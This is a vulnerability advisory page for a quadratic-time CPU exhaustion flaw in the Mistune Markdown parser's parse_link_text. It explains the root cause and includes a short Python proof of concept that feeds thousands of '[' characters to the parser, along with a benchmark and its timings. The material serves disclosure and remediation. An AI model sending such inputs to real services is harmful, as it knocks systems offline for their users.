CVE-2026-49851
Summary
Mistune is vulnerable to a CPU exhaustion DoS due to superlinear (approximately O(n²)) behavior in parse_link_text. A relatively small input consisting of repeated [ characters causes significant parsing slowdown.
Affected component
mistune/inline_parser.py → **parse_link_text**
Description
When parsing Markdown containing many consecutive [ characters, parse_link_text repeatedly scans the input using a regex search inside a loop. Each iteration re-scans a large portion of the remaining string, resulting in quadratic-time behavior.
An attacker-controlled Markdown input can therefore trigger excessive CPU usage with a very small payload.
Root cause
The vulnerability stems from a two-loop interaction:
- The outer loop in InlineParser.parse() (inline_parser.py) advances
only 1 character at a time when parse_link() returns None
- Each failed attempt calls parse_link_text() which performs an O(n)
scan to the end of the string looking for a closing ]
- With n consecutive [ characters, this results in O(n) × O(n) = O(n²)
total work
PoC
Run below python script
import mistune
import time
md = mistune.create_markdown()
s = "[" * 6400
t = time.perf_counter()
md(s)
print(time.perf_counter() - t)
<img width="2028" height="1277" alt="image" src="https://github.com/user-attachments/assets/15d5bc0b-35f8-4a15-85e0-cbc314a45b06" />
Benmark poc
Run below code for benchmark
import mistune
import time
md = mistune.create_markdown()
sizes = [100,200,400,800,1600,3200,6400]
for n in sizes:
s = "[" * n
t0 = time.perf_counter()
md(s)
dt = time.perf_counter() - t0
print(f"{n:6d} {dt:.6f}")
<img width="2503" height="1341" alt="image" src="https://github.com/user-attachments/assets/f09a7bbb-6927-4ba2-afb1-444dd913b84e" />
Observed behaviour
python3 benchmark.py
100 0.001609
200 0.003207
400 0.012906
800 0.050220
1600 0.197307
3200 0.801172
6400 3.190393
Execution time grows superlinearly, consistent with O(n²) complex
Impact
This can be used as a denial-of-service
CSIRTS triage
- What
- There is a potential Denial of Service (DoS) vulnerability due to quadratic-time parsing in the parse_link_text function.
- Who is affected
- Deployments of Mistune are affected.
- Urgency
- Remediation is necessary to prevent potential DoS attacks, though exploitation is not currently observed.
- Action
- Update to the latest version of Mistune when available.
AI-assisted analysis generated from the source advisory — verify against the original.
⚡ Watch CVE-2026-49851
Get an email if CVE-2026-49851 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Exploitation outlook
- Low exploitation risk0.35% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 27% of all EPSS-scored CVEs.
Advisory coverage (2)
- highGHSA-qcq2-496w-v96p: Mistune: Potential DoS via quadratic-time parsing in parse_link_textghsa · 2026-07-09
- unknownCVE-2026-49851: Mistune: Potential DoS via quadratic-time parsing in parse_link_textmsrc · 2026-06-09
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2026-49851)